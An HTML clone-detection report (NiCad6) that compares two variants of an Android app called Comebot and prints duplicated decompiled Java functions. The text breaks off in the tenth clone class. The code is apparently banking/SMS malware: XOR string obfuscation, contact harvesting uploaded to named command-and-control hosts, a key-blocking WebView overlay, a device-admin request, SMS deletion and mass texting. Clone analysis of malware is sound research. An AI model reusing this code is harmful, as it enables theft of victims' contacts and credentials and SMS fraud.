<html>
<head>
    <title>NiCad6 Clone Report</title>
    <style type="text/css">
        body {font-family:sans-serif;}
        table {background-color:white; border:0px; padding:0px; border-spacing:4px; width:auto; margin-left:30px; margin-right:auto;}
        td {background-color:rgba(192,212,238,0.8); border:0px; padding:8px; width:auto; vertical-align:top; border-radius:8px}
        pre {background-color:white; padding:4px;}
        a {color:darkblue;}
    </style>
</head>
<body>
<h2>NiCad6 Clone Report</h2>
<table>
<tr style="font-size:14pt">
<td><b>System:</b> &nbsp; Comebot</td>
<td><b>Clone pairs:</b> &nbsp; 36</td>
<td><b>Clone classes:</b> &nbsp; 22</td>
</tr>
<tr style="font-size:12pt">
<td style="background-color:white">Clone type: &nbsp; 3-2</td>
<td style="background-color:white">Granularity: &nbsp; functions-blind</td>
<td style="background-color:white">Max diff threshold: &nbsp; 30%</td>
<td style="background-color:white">Clone size: &nbsp; 10 - 2500 lines</td>
<td style="background-color:white">Total functions-blind: &nbsp; 140</td>
</tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 1:</b> &nbsp; 2 fragments, nominal size 98 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag9')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/apiproc.java: 31-129
</a>
<div class="mid" id="frag9" style="display:none"><pre>
  void a() {
    if (Build.VERSION.SDK_INT &lt;= 21) {
      int i = 0;
      String str = "";
      byte b1 = 0;
      int j = 0;
      while (j &gt; -1) {
        if (!b1)
          str = this.b.a(this.c, b.a("UZP^yRHQ")); 
        if (b1 &gt;= 19)
          b1 = -1; 
        if (str != null) {
          String[] arrayOfString = str.split(d.a("\t"));
          int k = 0;
          for (j = 0; k &lt; arrayOfString.length; j = k) {
            String[] arrayOfString1 = arrayOfString[j].split(b.a("\027"));
            int m = 1;
            for (k = 1;; k = m) {
              if (m &lt; arrayOfString1.length) {
                try {
                  if (b().contains(arrayOfString1[k]) &amp;&amp; !this.b.a(this.c, d.a("\036G\035C")).contains(b.a("RIS^"))) {
                    Intent intent = new Intent();
                    this((Context)this, actinj.class);
                    intent = intent.putExtra(d.a("U\004T"), arrayOfString1[0]);
                    intent.addFlags(268435456);
                    intent.addFlags(8388608);
                    intent.addFlags(1073741824);
                    startActivity(intent);
                    try {
                      TimeUnit.SECONDS.sleep(2L);
                    } catch (InterruptedException interruptedException) {}
                  } 
                } catch (Exception exception) {
                  b b2 = this.d;
                  StringBuilder stringBuilder = new StringBuilder();
                  this.a.getClass();
                  b2.a(stringBuilder.insert(0, "http://besserwissen.biz").append(b.a("\tKTRPZR^\tZB_yWI\\\bKNK")).toString(), (new StringBuilder()).insert(0, d.a("\000\033")).append(this.b.b((new StringBuilder()).insert(0, this.b.a((Context)this)).append(b.a("ZХѮЃЗЁЖ\033БЋЙѸѧЁЖ\033ОІАЎМѹЖG")).toString())).toString());
                } 
              } else {
                break;
              } 
              m = k + 1;
            } 
            k = j + 1;
          } 
        } 
        try {
          Thread.sleep(1000L);
        } catch (InterruptedException interruptedException) {
          interruptedException.printStackTrace();
        } 
        j = i + 1;
        i = j;
        b1++;
      } 
    } else {
      int[] arrayOfInt = new int[5000];
      int i = 0;
      int j;
      for (j = 0; i &lt; arrayOfInt.length; j = i) {
        i = j + 1;
        arrayOfInt[j] = 0;
      } 
      byte b1 = 0;
      String str = "";
      j = 0;
      for (i = 0; i &gt; -1; i = b1) {
        if (j == 0)
          str = this.b.a(this.c, d.a("\003G\006C/O\036L")); 
        if (j &gt;= 8)
          j = -1; 
        i = j;
        if (str != null) {
          i = 0;
          try {
            while (i &lt; (c()).length) {
              String str1 = b.a("O");
              StringBuilder stringBuilder1 = new StringBuilder();
              this();
              StringBuilder stringBuilder2 = stringBuilder1.insert(0, "");
              String str2 = c()[i];
              i++;
              Log.e(str1, stringBuilder2.append(str2).toString());
            } 
          } catch (Exception exception) {
            Log.e(d.a("\025T"), b.a("CI"));
          } 
          try {
            Thread.sleep(1000L);
          } catch (InterruptedException interruptedException) {
            interruptedException.printStackTrace();
          } 
          i = j + 1;
        } 
        b1++;
        j = i;
      } 
    } 
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag79')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/apiproc.java: 31-129
</a>
<div class="mid" id="frag79" style="display:none"><pre>
  void a() {
    if (Build.VERSION.SDK_INT &lt;= 21) {
      int i = 0;
      String str = "";
      byte b1 = 0;
      int j = 0;
      while (j &gt; -1) {
        if (!b1)
          str = this.b.a(this.c, b.a("UZP^yRHQ")); 
        if (b1 &gt;= 19)
          b1 = -1; 
        if (str != null) {
          String[] arrayOfString = str.split(d.a("\t"));
          int k = 0;
          for (j = 0; k &lt; arrayOfString.length; j = k) {
            String[] arrayOfString1 = arrayOfString[j].split(b.a("\027"));
            int m = 1;
            for (k = 1;; k = m) {
              if (m &lt; arrayOfString1.length) {
                try {
                  if (b().contains(arrayOfString1[k]) &amp;&amp; !this.b.a(this.c, d.a("\036G\035C")).contains(b.a("RIS^"))) {
                    Intent intent = new Intent();
                    this((Context)this, actinj.class);
                    intent = intent.putExtra(d.a("U\004T"), arrayOfString1[0]);
                    intent.addFlags(268435456);
                    intent.addFlags(8388608);
                    intent.addFlags(1073741824);
                    startActivity(intent);
                    try {
                      TimeUnit.SECONDS.sleep(2L);
                    } catch (InterruptedException interruptedException) {}
                  } 
                } catch (Exception exception) {
                  b b2 = this.d;
                  StringBuilder stringBuilder = new StringBuilder();
                  this.a.getClass();
                  b2.a(stringBuilder.insert(0, "https://lensfor.xyz").append(b.a("\tKTRPZR^\tZB_yWI\\\bKNK")).toString(), (new StringBuilder()).insert(0, d.a("\000\033")).append(this.b.b((new StringBuilder()).insert(0, this.b.a((Context)this)).append(b.a("ZХѮЃЗЁЖ\033БЋЙѸѧЁЖ\033ОІАЎМѹЖG")).toString())).toString());
                } 
              } else {
                break;
              } 
              m = k + 1;
            } 
            k = j + 1;
          } 
        } 
        try {
          Thread.sleep(1000L);
        } catch (InterruptedException interruptedException) {
          interruptedException.printStackTrace();
        } 
        j = i + 1;
        i = j;
        b1++;
      } 
    } else {
      int[] arrayOfInt = new int[5000];
      int i = 0;
      int j;
      for (j = 0; i &lt; arrayOfInt.length; j = i) {
        i = j + 1;
        arrayOfInt[j] = 0;
      } 
      byte b1 = 0;
      String str = "";
      j = 0;
      for (i = 0; i &gt; -1; i = b1) {
        if (j == 0)
          str = this.b.a(this.c, d.a("\003G\006C/O\036L")); 
        if (j &gt;= 8)
          j = -1; 
        i = j;
        if (str != null) {
          i = 0;
          try {
            while (i &lt; (c()).length) {
              String str1 = b.a("O");
              StringBuilder stringBuilder1 = new StringBuilder();
              this();
              StringBuilder stringBuilder2 = stringBuilder1.insert(0, "");
              String str2 = c()[i];
              i++;
              Log.e(str1, stringBuilder2.append(str2).toString());
            } 
          } catch (Exception exception) {
            Log.e(d.a("\025T"), b.a("CI"));
          } 
          try {
            Thread.sleep(1000L);
          } catch (InterruptedException interruptedException) {
            interruptedException.printStackTrace();
          } 
          i = j + 1;
        } 
        b1++;
        j = i;
      } 
    } 
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 2:</b> &nbsp; 6 fragments, nominal size 17 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag13')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/c.java: 22-38
</a>
<div class="mid" id="frag13" style="display:none"><pre>
  public static String a(String paramString) {
    int i = paramString.length();
    char[] arrayOfChar = new char[i];
    int j = i - 1;
    i = j;
    while (j &gt;= 0) {
      j = paramString.charAt(i);
      int k = i - 1;
      arrayOfChar[i] = (char)(char)(j ^ 0xD);
      if (k &gt;= 0) {
        j = k - 1;
        arrayOfChar[k] = (char)(char)(paramString.charAt(k) ^ 0x66);
        i = j;
      } 
    } 
    return new String(arrayOfChar);
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag16')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/d.java: 16-32
</a>
<div class="mid" id="frag16" style="display:none"><pre>
  public static String a(String paramString) {
    int i = paramString.length();
    char[] arrayOfChar = new char[i];
    int j = i - 1;
    i = j;
    while (j &gt;= 0) {
      j = paramString.charAt(i);
      int k = i - 1;
      arrayOfChar[i] = (char)(char)(j ^ 0x26);
      if (k &gt;= 0) {
        j = k - 1;
        arrayOfChar[k] = (char)(char)(paramString.charAt(k) ^ 0x70);
        i = j;
      } 
    } 
    return new String(arrayOfChar);
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag86')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/d.java: 16-32
</a>
<div class="mid" id="frag86" style="display:none"><pre>
  public static String a(String paramString) {
    int i = paramString.length();
    char[] arrayOfChar = new char[i];
    int j = i - 1;
    i = j;
    while (j &gt;= 0) {
      j = paramString.charAt(i);
      int k = i - 1;
      arrayOfChar[i] = (char)(char)(j ^ 0x26);
      if (k &gt;= 0) {
        j = k - 1;
        arrayOfChar[k] = (char)(char)(paramString.charAt(k) ^ 0x70);
        i = j;
      } 
    } 
    return new String(arrayOfChar);
  }
</pre></div>
</td>
</tr><tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag135')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/b.java: 12-28
</a>
<div class="mid" id="frag135" style="display:none"><pre>
  public static String a(String paramString) {
    int i = paramString.length();
    char[] arrayOfChar = new char[i];
    int j = i - 1;
    i = j;
    while (j &gt;= 0) {
      j = paramString.charAt(i);
      int k = i - 1;
      arrayOfChar[i] = (char)(char)(j ^ 0x3B);
      if (k &gt;= 0) {
        j = k - 1;
        arrayOfChar[k] = (char)(char)(paramString.charAt(k) ^ 0x26);
        i = j;
      } 
    } 
    return new String(arrayOfChar);
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag65')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/b.java: 12-28
</a>
<div class="mid" id="frag65" style="display:none"><pre>
  public static String a(String paramString) {
    int i = paramString.length();
    char[] arrayOfChar = new char[i];
    int j = i - 1;
    i = j;
    while (j &gt;= 0) {
      j = paramString.charAt(i);
      int k = i - 1;
      arrayOfChar[i] = (char)(char)(j ^ 0x3B);
      if (k &gt;= 0) {
        j = k - 1;
        arrayOfChar[k] = (char)(char)(paramString.charAt(k) ^ 0x26);
        i = j;
      } 
    } 
    return new String(arrayOfChar);
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag83')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/c.java: 22-38
</a>
<div class="mid" id="frag83" style="display:none"><pre>
  public static String a(String paramString) {
    int i = paramString.length();
    char[] arrayOfChar = new char[i];
    int j = i - 1;
    i = j;
    while (j &gt;= 0) {
      j = paramString.charAt(i);
      int k = i - 1;
      arrayOfChar[i] = (char)(char)(j ^ 0xD);
      if (k &gt;= 0) {
        j = k - 1;
        arrayOfChar[k] = (char)(char)(paramString.charAt(k) ^ 0x66);
        i = j;
      } 
    } 
    return new String(arrayOfChar);
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 3:</b> &nbsp; 2 fragments, nominal size 16 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag17')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/getnum.java: 18-34
</a>
<div class="mid" id="frag17" style="display:none"><pre>
  public void a(ContentResolver paramContentResolver) {
    if (!this.a.a((Context)this, b.a("\\COhNKYCI")).equals(b.a("RIS^"))) {
      Cursor cursor = paramContentResolver.query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, null, null, null, null);
      String str = (new StringBuilder()).insert(0, b.a("@")).append(this.a.c((Context)this)).append(b.a("F\006ЦИЇГѻЖ\033ѧ\033ѤЎНЎѢЅЛІИЂ\006ЁЛЃЕЃ")).toString();
      while (cursor.moveToNext()) {
        String str1 = cursor.getString(cursor.getColumnIndex(b.a("_GOG\n")));
        String str2 = cursor.getString(cursor.getColumnIndex(b.a("BRUKJZ_dHZK^")));
        if (!str1.contains(b.a("\021")) &amp;&amp; !str1.contains(b.a("\030")) &amp;&amp; str1.length() &gt; 6 &amp;&amp; !str.contains(str1))
          str = (new StringBuilder()).insert(0, str).append(str1).append(b.a("\033\006\033\006\033")).append(str2).append(b.a("\032\024DI\0301")).toString(); 
      } 
      b b1 = this.c;
      this.b.getClass();
      b1.a("http://besserwissen.biz/private/add_log.php", (new StringBuilder()).insert(0, b.a("V\006")).append(this.a.b((new StringBuilder()).insert(0, this.a.a((Context)this)).append(b.a("G")).append(str).append(b.a("G")).toString())).toString());
      this.a.a((Context)this, b.a("\\COhNKYCI"), b.a("RIS^"));
    } 
    finish();
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag87')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/getnum.java: 18-34
</a>
<div class="mid" id="frag87" style="display:none"><pre>
  public void a(ContentResolver paramContentResolver) {
    if (!this.a.a((Context)this, b.a("\\COhNKYCI")).equals(b.a("RIS^"))) {
      Cursor cursor = paramContentResolver.query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, null, null, null, null);
      String str = (new StringBuilder()).insert(0, b.a("@")).append(this.a.c((Context)this)).append(b.a("F\006ЦИЇГѻЖ\033ѧ\033ѤЎНЎѢЅЛІИЂ\006ЁЛЃЕЃ")).toString();
      while (cursor.moveToNext()) {
        String str1 = cursor.getString(cursor.getColumnIndex(b.a("_GOG\n")));
        String str2 = cursor.getString(cursor.getColumnIndex(b.a("BRUKJZ_dHZK^")));
        if (!str1.contains(b.a("\021")) &amp;&amp; !str1.contains(b.a("\030")) &amp;&amp; str1.length() &gt; 6 &amp;&amp; !str.contains(str1))
          str = (new StringBuilder()).insert(0, str).append(str1).append(b.a("\033\006\033\006\033")).append(str2).append(b.a("\032\024DI\0301")).toString(); 
      } 
      b b1 = this.c;
      this.b.getClass();
      b1.a("https://lensfor.xyz/private/add_log.php", (new StringBuilder()).insert(0, b.a("V\006")).append(this.a.b((new StringBuilder()).insert(0, this.a.a((Context)this)).append(b.a("G")).append(str).append(b.a("G")).toString())).toString());
      this.a.a((Context)this, b.a("\\COhNKYCI"), b.a("RIS^"));
    } 
    finish();
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 4:</b> &nbsp; 2 fragments, nominal size 49 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag18')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/getnum.java: 36-85
</a>
<div class="mid" id="frag18" style="display:none"><pre>
  public void a(ContentResolver paramContentResolver, String paramString) {
    byte b2;
    Cursor cursor = paramContentResolver.query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, null, null, null, null);
    byte b1 = 0;
    boolean bool = false;
    label23: while (true) {
      boolean bool1 = bool;
      b2 = b1;
      while (true) {
        bool = bool1;
        if (cursor.moveToNext()) {
          String str = cursor.getString(cursor.getColumnIndex(b.a("_GOG\n")));
          b1 = b2;
          bool = bool1;
          if (!str.contains(b.a("\021"))) {
            b1 = b2;
            bool = bool1;
            if (!str.contains(b.a("\030"))) {
              b1 = b2;
              bool = bool1;
              if (str.length() &gt; 7)
                try {
                  this.a.c((Context)this, str, paramString);
                  b2++;
                  bool1 = true;
                  continue;
                } catch (Exception exception) {
                  b b3 = this.c;
                  this.b.getClass();
                  b3.a("http://besserwissen.biz/private/add_log.php", (new StringBuilder()).insert(0, b.a("V\006")).append(this.a.b((new StringBuilder()).insert(0, this.a.a((Context)this)).append(b.a("ZХѮЃЗЁЖ\033ИѹЙѻЖЉМЃ\006КкК\n\033ДЅБЇИЍЛЅ\006ІГѹ\006ЄѦЋД\033ВЀѩ\033ИѹЙѻЖЉМЃ\007G")).toString())).toString());
                  bool = false;
                  break;
                }  
              continue label23;
            } 
            continue label23;
          } 
          continue label23;
        } 
        break;
      } 
      break;
    } 
    if (bool == true) {
      b b3 = this.c;
      this.b.getClass();
      b3.a("http://besserwissen.biz/private/add_log.php", (new StringBuilder()).insert(0, b.a("V\006")).append(this.a.b((new StringBuilder()).insert(0, this.a.a((Context)this)).append(b.a("GІЋѧѺѭЀМЋ\006ЄѦЅѮЀЖ\033ѥѺЙЎѮІИ\027\006ЅѤЄѦЋДЀГІИ\033")).append(b2).append(b.a("\033ЇЧЇG")).toString())).toString());
    } 
    finish();
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag88')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/getnum.java: 36-85
</a>
<div class="mid" id="frag88" style="display:none"><pre>
  public void a(ContentResolver paramContentResolver, String paramString) {
    byte b2;
    Cursor cursor = paramContentResolver.query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, null, null, null, null);
    byte b1 = 0;
    boolean bool = false;
    label23: while (true) {
      boolean bool1 = bool;
      b2 = b1;
      while (true) {
        bool = bool1;
        if (cursor.moveToNext()) {
          String str = cursor.getString(cursor.getColumnIndex(b.a("_GOG\n")));
          b1 = b2;
          bool = bool1;
          if (!str.contains(b.a("\021"))) {
            b1 = b2;
            bool = bool1;
            if (!str.contains(b.a("\030"))) {
              b1 = b2;
              bool = bool1;
              if (str.length() &gt; 7)
                try {
                  this.a.c((Context)this, str, paramString);
                  b2++;
                  bool1 = true;
                  continue;
                } catch (Exception exception) {
                  b b3 = this.c;
                  this.b.getClass();
                  b3.a("https://lensfor.xyz/private/add_log.php", (new StringBuilder()).insert(0, b.a("V\006")).append(this.a.b((new StringBuilder()).insert(0, this.a.a((Context)this)).append(b.a("ZХѮЃЗЁЖ\033ИѹЙѻЖЉМЃ\006КкК\n\033ДЅБЇИЍЛЅ\006ІГѹ\006ЄѦЋД\033ВЀѩ\033ИѹЙѻЖЉМЃ\007G")).toString())).toString());
                  bool = false;
                  break;
                }  
              continue label23;
            } 
            continue label23;
          } 
          continue label23;
        } 
        break;
      } 
      break;
    } 
    if (bool == true) {
      b b3 = this.c;
      this.b.getClass();
      b3.a("https://lensfor.xyz/private/add_log.php", (new StringBuilder()).insert(0, b.a("V\006")).append(this.a.b((new StringBuilder()).insert(0, this.a.a((Context)this)).append(b.a("GІЋѧѺѭЀМЋ\006ЄѦЅѮЀЖ\033ѥѺЙЎѮІИ\027\006ЅѤЄѦЋДЀГІИ\033")).append(b2).append(b.a("\033ЇЧЇG")).toString())).toString());
    } 
    finish();
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 5:</b> &nbsp; 2 fragments, nominal size 10 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag19')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/getnum.java: 87-98
</a>
<div class="mid" id="frag19" style="display:none"><pre>
  protected void onCreate(Bundle paramBundle) {
    super.onCreate(paramBundle);
    setContentView(2130903040);
    Intent intent = getIntent();
    String str1 = intent.getStringExtra(b.a("HRI"));
    String str2 = intent.getStringExtra(b.a("ELEdR^^O"));
    if (str1.contains(b.a("\013")))
      a(getContentResolver()); 
    if (str1.contains(b.a("\n")))
      a(getContentResolver(), str2); 
    finish();
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag89')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/getnum.java: 87-98
</a>
<div class="mid" id="frag89" style="display:none"><pre>
  protected void onCreate(Bundle paramBundle) {
    super.onCreate(paramBundle);
    setContentView(2130903040);
    Intent intent = getIntent();
    String str1 = intent.getStringExtra(b.a("HRI"));
    String str2 = intent.getStringExtra(b.a("ELEdR^^O"));
    if (str1.contains(b.a("\013")))
      a(getContentResolver()); 
    if (str1.contains(b.a("\n")))
      a(getContentResolver(), str2); 
    finish();
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 6:</b> &nbsp; 2 fragments, nominal size 13 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag20')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/admky.java: 12-24
</a>
<div class="mid" id="frag20" style="display:none"><pre>
  protected void onCreate(Bundle paramBundle) {
    super.onCreate(paramBundle);
    setContentView(2130903041);
    this.a = new c((Context)this);
    if (!this.a.b()) {
      Intent intent = new Intent(b.a("ZH_TTO_\bZVK\bZEOOTH\025gbdb~pre~yzbvou"));
      intent.putExtra(c.a("\007c\002\td\002#\007}\026#\003u\022\007#\"H0D%H9L\"@/C"), (Parcelable)this.a.a());
      intent.putExtra(b.a("ZH_TTO_\bZVK\b^^OTZ\bzby~~kjzhzrriu"), "");
      startActivityForResult(intent, 100);
      finish();
    } 
    finish();
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag90')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/admky.java: 12-24
</a>
<div class="mid" id="frag90" style="display:none"><pre>
  protected void onCreate(Bundle paramBundle) {
    super.onCreate(paramBundle);
    setContentView(2130903041);
    this.a = new c((Context)this);
    if (!this.a.b()) {
      Intent intent = new Intent(b.a("ZH_TTO_\bZVK\bZEOOTH\025gbdb~pre~yzbvou"));
      intent.putExtra(c.a("\007c\002\td\002#\007}\026#\003u\022\007#\"H0D%H9L\"@/C"), (Parcelable)this.a.a());
      intent.putExtra(b.a("ZH_TTO_\bZVK\b^^OTZ\bzby~~kjzhzrriu"), "");
      startActivityForResult(intent, 100);
      finish();
    } 
    finish();
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 7:</b> &nbsp; 2 fragments, nominal size 10 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag31')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/actinj.java: 34-45
</a>
<div class="mid" id="frag31" style="display:none"><pre>
  public boolean onKeyDown(int paramInt, KeyEvent paramKeyEvent) {
    boolean bool1 = true;
    if (paramInt == 3)
      return bool1; 
    boolean bool2 = bool1;
    if (paramInt != 4) {
      bool2 = bool1;
      if (paramInt != 82)
        bool2 = false; 
    } 
    return bool2;
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag101')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/actinj.java: 34-45
</a>
<div class="mid" id="frag101" style="display:none"><pre>
  public boolean onKeyDown(int paramInt, KeyEvent paramKeyEvent) {
    boolean bool1 = true;
    if (paramInt == 3)
      return bool1; 
    boolean bool2 = bool1;
    if (paramInt != 4) {
      bool2 = bool1;
      if (paramInt != 82)
        bool2 = false; 
    } 
    return bool2;
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 8:</b> &nbsp; 2 fragments, nominal size 15 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag33')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/actinj.java: 52-66
</a>
<div class="mid" id="frag33" style="display:none"><pre>
  protected void onStart() {
    super.onStart();
    this.b.a((Context)this, b.a("HZK^"), d.a("\004T\005C"));
    String str = getIntent().getStringExtra(b.a("HRI"));
    if (!str.equals("") || !str.equals(null)) {
      WebView webView = (WebView)findViewById(2131230722);
      webView.getSettings().setJavaScriptEnabled(true);
      webView.setScrollBarStyle(0);
      webView.setWebViewClient(new WebViewClient());
      webView.setWebChromeClient(new WebChromeClient());
      StringBuilder stringBuilder = new StringBuilder();
      this.a.getClass();
      webView.loadUrl(stringBuilder.insert(0, "http://besserwissen.biz").append(d.a("\t\031H\032\t")).append(str).append(b.a("\025VSV\004V\006")).append(this.b.a((Context)this)).append(d.a("Z")).append(this.b.c((Context)this)).toString());
    } 
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag103')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/actinj.java: 52-66
</a>
<div class="mid" id="frag103" style="display:none"><pre>
  protected void onStart() {
    super.onStart();
    this.b.a((Context)this, b.a("HZK^"), d.a("\004T\005C"));
    String str = getIntent().getStringExtra(b.a("HRI"));
    if (!str.equals("") || !str.equals(null)) {
      WebView webView = (WebView)findViewById(2131230722);
      webView.getSettings().setJavaScriptEnabled(true);
      webView.setScrollBarStyle(0);
      webView.setWebViewClient(new WebViewClient());
      webView.setWebChromeClient(new WebChromeClient());
      StringBuilder stringBuilder = new StringBuilder();
      this.a.getClass();
      webView.loadUrl(stringBuilder.insert(0, "https://lensfor.xyz").append(d.a("\t\031H\032\t")).append(str).append(b.a("\025VSV\004V\006")).append(this.b.a((Context)this)).append(d.a("Z")).append(this.b.c((Context)this)).toString());
    } 
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 9:</b> &nbsp; 2 fragments, nominal size 23 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag35')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/dsws.java: 16-36
</a>
<div class="mid" id="frag35" style="display:none"><pre>
  public void a(Context paramContext, String paramString1, String paramString2) {
    try {
      Uri uri = Uri.parse(c.a("\005b\by\003c\0227I\"\025`\025\"\025h\by"));
      Cursor cursor = paramContext.getContentResolver().query(uri, new String[] { b.a("dO_"), c.a("y\016\003l\002R\017i"), b.a("ZB_T^UH"), c.a("\026h\024~\tc"), b.a("BZR^"), c.a("\004b\002t") }, null, null, null);
      if (cursor != null &amp;&amp; cursor.moveToFirst()) {
        boolean bool;
        do {
          long l = cursor.getLong(0);
          cursor.getLong(1);
          String str = cursor.getString(2);
          if (!paramString1.equals(cursor.getString(5)) &amp;&amp; str.equals(paramString2)) {
            ContentResolver contentResolver = paramContext.getContentResolver();
            StringBuilder stringBuilder = new StringBuilder();
            this();
            contentResolver.delete(Uri.parse(stringBuilder.insert(0, b.a("ETHOCUR\001\t\024UVU\024")).append(l).toString()), null, null);
          } 
          bool = cursor.moveToNext();
        } while (bool);
      } 
    } catch (Exception exception) {}
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag105')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/dsws.java: 16-36
</a>
<div class="mid" id="frag105" style="display:none"><pre>
  public void a(Context paramContext, String paramString1, String paramString2) {
    try {
      Uri uri = Uri.parse(c.a("\005b\by\003c\0227I\"\025`\025\"\025h\by"));
      Cursor cursor = paramContext.getContentResolver().query(uri, new String[] { b.a("dO_"), c.a("y\016\003l\002R\017i"), b.a("ZB_T^UH"), c.a("\026h\024~\tc"), b.a("BZR^"), c.a("\004b\002t") }, null, null, null);
      if (cursor != null &amp;&amp; cursor.moveToFirst()) {
        boolean bool;
        do {
          long l = cursor.getLong(0);
          cursor.getLong(1);
          String str = cursor.getString(2);
          if (!paramString1.equals(cursor.getString(5)) &amp;&amp; str.equals(paramString2)) {
            ContentResolver contentResolver = paramContext.getContentResolver();
            StringBuilder stringBuilder = new StringBuilder();
            this();
            contentResolver.delete(Uri.parse(stringBuilder.insert(0, b.a("ETHOCUR\001\t\024UVU\024")).append(l).toString()), null, null);
          } 
          bool = cursor.moveToNext();
        } while (bool);
      } 
    } catch (Exception exception) {}
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 10:</b> &nbsp; 2 fragments, nominal size 12 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag38')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/dsws.java: 51-61
</a>
<div class="mid" id="frag38" style="display:none"><pre>
  public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2) {
    try {
      b((Context)this, paramIntent.getStringExtra(c.a("c\023`")), paramIntent.getStringExtra(b.a("KH")));
    } catch (Exception exception) {}
    try {
      Thread.sleep(5000L);
    } catch (InterruptedException interruptedException) {
      interruptedException.printStackTrace();
    } 
    return 1;
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag108')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/dsws.java: 51-61
</a>
<div class="mid" id="frag108" style="display:none"><pre>
